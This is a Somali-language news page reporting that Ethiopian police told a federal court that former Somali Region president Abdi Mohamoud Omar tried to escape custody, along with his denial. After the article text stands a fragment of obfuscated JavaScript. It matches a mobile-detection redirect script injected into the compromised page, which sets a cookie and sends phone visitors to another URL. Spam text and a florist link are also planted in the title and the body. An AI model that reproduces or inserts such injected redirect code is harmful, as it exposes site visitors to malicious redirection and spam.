Friday, June 26, 2026
HomeWararCabdi Max'ud Cumar Oo isku Dayey In Uu Ka Baxsado Xabsiga flowers...

Cabdi Max’ud Cumar Oo isku Dayey In Uu Ka Baxsado Xabsiga flowers oshawa delivery

Booliska dalka Itoobiya ayaa maxkamadda Sare ee Itoobiya oo gacanta ku hayso dacwadda Madaxweynihi hore ee Deegaanka Soomaalida ee dalka Itoobiya Cabdi Maxamuud Cumar ku wargeliyey inuu isku dayay xabsiga inuu ka baxsado.

Warkan oo aan ka soo xigannay Bogga FBC ayaa wuxuu sheegayaa Cabdi Maxamuud Cumar oo lagu soo eedeeyey rabshadihii 5-ta maalmood ka dhacay Magaalada Jigjiga oo ay dad badanna ku dhinteen hanti badanna ay ku burburtay inuu isaga ka dambeeyey ayay booliska Federaalka Itoobiya gacanta ku soo dhigeen.

Haddaba Cabdi Maxamuud Cumar oo maanta ka muddeysnaa Maxkamadda sare ee Fedeeraalka Itoobiya oo maxkamadda la horkeenay ayaa waxay Boolisku sheegeen iyada oo amnigiisa iyo caafimaadkiisa loogu daneynayo in cabdi lagu xiray xabsi ku dhex yaalla xaruunta booliska.

Hase ahaatee, Cabdi wuxuu soo jabiyey muraayadda daaqadda qolka uu ku jiray wuxuuna cunaha ku dhagay mid ka mid ah askarta ilaalada uga jirtay qolka uu ku xirnaa isaga oo tillaabadaasi uu qaaday uga dan lahaa inuu xabsiga sidaa uu kaga baxsado.

Cabdi Maxamuud Cumar eedda iskudayga ka baxsashada xabsiga ee ay boolisku u soo jeediyeen mar ay maxkamadda wax ka weydiisay ayaa wuxuu ku jawaabay a�?inuusan falkaasi sameeynin eedduna ay tahay mid sumcaddiisa lagu waxyeelleynayo isla markaana lagu doonayo in jirdilkiisa lagu banneystoa�?.

Wuxuuna intaa ku daray a�?Waxa laga sheegay iney been tahay shaqsi ahaanna cadaadis aad u weyn lagu hayo. Xabsi aan munaasab ahayna lagu xiray, nin maskaxda ka jirran oo ku xiran qol isaga ku dhaggan kan uu isagu ku jiro inuu 2 mar albaabka uu ku soo jabiyey oo uu waxyeella u geysan gaaray xaaladdaasina ay ammaankiisa khatar aad u weyn ku hayso.a�?

a�?Maalinna isaga oo suuli ku jira inuu nin macabiista ka mid ah uu soo weeraraya�? ayuu sida oo kale maxkamadda u sheegay.

a�?Guud ahaanna xabsiga aan ku xiranahayma aha mid munaasab ah isla-markaana caafimaad darro uu kala kulmay.a�?

Dambi baaraha kiiska Cabdi gacanta ku hayana wuxuu maxkamadda horteeda uu ka sheegay a�?inuu Cabdi uu ku xiran yahay xabsiyada caadiga ah ee maxabiista caadiga ah lagu xiro, wax cadaadis oo si gaar ah isaga looga hayana uusan jirin.

Wuxuuna dambi baaruhu intaa ku daray a�?boolisku wixi dhacay markay Cabdi kala hadleen oo rabshadda xabsiga ka dhacday inuu isagu sabab u ahaa inuu qirtay isla-markaana raalli gelin uu ka bixiyey.a�?

Booliskuna waxay maxkamaddu weydiisteen a�?10 maalmood oo kale oo ay Kiiska Cabdi baaritaan dheeraad ah ugu soo sameeyaan in la siiyo.a�?

Ugu dambeyn, maxkamadda oo codsiga booliska aqbashay waxay u muddeysay in cabdi Maxkamadda la keeno 29-ka bisha October. |t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
https://flowercompany.ca/oshawa/

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe